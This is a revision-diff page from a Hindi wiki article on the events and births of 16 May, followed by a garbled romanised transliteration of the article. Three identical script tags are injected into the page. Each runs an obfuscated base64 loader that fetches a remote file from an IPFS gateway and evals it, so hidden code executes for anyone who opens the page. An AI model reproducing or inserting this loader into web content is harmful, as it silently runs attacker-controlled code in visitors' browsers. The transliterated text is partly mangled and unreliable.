Difference between revisions of "16 मई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 4: Line 4:
  
 
==16 मई की महत्त्वपूर्ण घटनाएँ==
 
==16 मई की महत्त्वपूर्ण घटनाएँ==
* [[1999]] - दक्षेस का 2002 ई. में होने वाला शिखर सम्मेलन थिम्पू में कराये जाने की घोषणा।  
+
* [[1999]] - [[दक्षेस]] का [[2002]] ई. में होने वाला '''शिखर सम्मेलन''' थिम्पू में कराये जाने की घोषणा।  
 
* [[2004]] - रोजर फ़ेडेरर ने हेम्बर्ग मास्टर्स ख़िताब जीता।  
 
* [[2004]] - रोजर फ़ेडेरर ने हेम्बर्ग मास्टर्स ख़िताब जीता।  
* [[2006]] - हालीवुड की चर्चित अदाकारा आस्कर पुरस्कार के लिए नामित नाओमी वाट्स को संयुक्त राष्ट्र संस्था का राजदूत बनाया गया। न्यूजीलैंड के 47 वर्षीय मार्क इंजलिस ऐसे पहले पर्वतारोही बन गये, जिन्होंने कृत्रिम पैरों के सहारे एवरेस्ट की चोटी पर झण्डा फहराया।  
+
* [[2006]] - हॉलीवुड की चर्चित अदाकारा ऑस्कर पुरस्कार के लिए नामित नाओमी वाट्स को [[संयुक्त राष्ट्र महासभा|संयुक्त राष्ट्र संस्था]] का राजदूत बनाया गया। न्यूजीलैंड के 47 वर्षीय मार्क इंजलिस ऐसे पहले पर्वतारोही बन गये, जिन्होंने कृत्रिम पैरों के सहारे [[एवरेस्ट]] की चोटी पर झण्डा फहराया।  
 
* [[2008]] -  
 
* [[2008]] -  
**[[उच्चतम न्यायालय]] ने केन्द्रीय शिक्षण संस्थानों के स्नाकोत्तर पाठ्यक्रमों में 27% ओबीसी कोटा पर रोक के [[कोलकाता]] उच्च न्यायालय के निर्णय को ख़ारिज कर दिया।
+
**[[उच्चतम न्यायालय]] ने केन्द्रीय शिक्षण संस्थानों के स्नाकोत्तर पाठ्यक्रमों में 27% ओबीसी कोटा पर रोक के [[कोलकाता]] [[उच्च न्यायालय]] के निर्णय को ख़ारिज कर दिया।
 
**[[प्रधानमंत्री]] [[मनमोहन सिंह]] [[भूटान]] की दो दिवसीय यात्रा पर थिम्पु पहुँचे।  
 
**[[प्रधानमंत्री]] [[मनमोहन सिंह]] [[भूटान]] की दो दिवसीय यात्रा पर थिम्पु पहुँचे।  
* [[2010]] - अजलन शाह कप हॉकी प्रतियोगिता में PTI पिछले विजेता [[भारत]] और दक्षिण कोरिया को बारिश केराण मैच न होसकने पर संयुक्त विजेता घोषित किया गया।
+
* [[2010]] - सुल्तान अजलान शाह कप हॉकी प्रतियोगिता में PTI पिछले विजेता [[भारत]] और दक्षिण कोरिया को बारिश के कारण मैच न होसकने पर संयुक्त विजेता घोषित किया गया।
 +
 
 
==16 मई को जन्मे व्यक्ति==
 
==16 मई को जन्मे व्यक्ति==
 
* 1805 - [[सर अलेक्ज़ेंडर बर्न्स]], वर्तमान [[पाकिस्तान]], [[अफ़ग़ानिस्तान]], तुर्कमेनिस्तान, [[उज़बेकिस्तान]] एवं [[ईरान]] में अभियानों के लिए प्रसिद्ध ब्रिटिश अन्वेषक एवं राजदूत थे।
 
* 1805 - [[सर अलेक्ज़ेंडर बर्न्स]], वर्तमान [[पाकिस्तान]], [[अफ़ग़ानिस्तान]], तुर्कमेनिस्तान, [[उज़बेकिस्तान]] एवं [[ईरान]] में अभियानों के लिए प्रसिद्ध ब्रिटिश अन्वेषक एवं राजदूत थे।

Revision as of 15:11, 17 May 2019

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 16 mee varsh ka 136 vaan (lip varsh mean yah 137 vaan) din hai. sal mean abhi aur 229 din shesh haian.

16 mee ki mahattvapoorn ghatanaean

  • 1999 - dakshes ka 2002 ee. mean hone vala shikhar sammelan thimpoo mean karaye jane ki ghoshana.
  • 2004 - rojar federar ne hembarg mastars khitab jita.
  • 2006 - h aaulivud ki charchit adakara aauskar puraskar ke lie namit naomi vats ko sanyukt rashtr sanstha ka rajadoot banaya gaya. nyoojilaiand ke 47 varshiy mark ianjalis aise pahale parvatarohi ban gaye, jinhoanne kritrim pairoan ke sahare evarest ki choti par jhanda phaharaya.
  • 2008 -
  • 2010 - sultan ajalan shah kap h aauki pratiyogita mean PTI pichhale vijeta bharat aur dakshin koriya ko barish ke karan maich n hosakane par sanyukt vijeta ghoshit kiya gaya.

16 mee ko janme vyakti

16 mee ko hue nidhan

16 mee ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>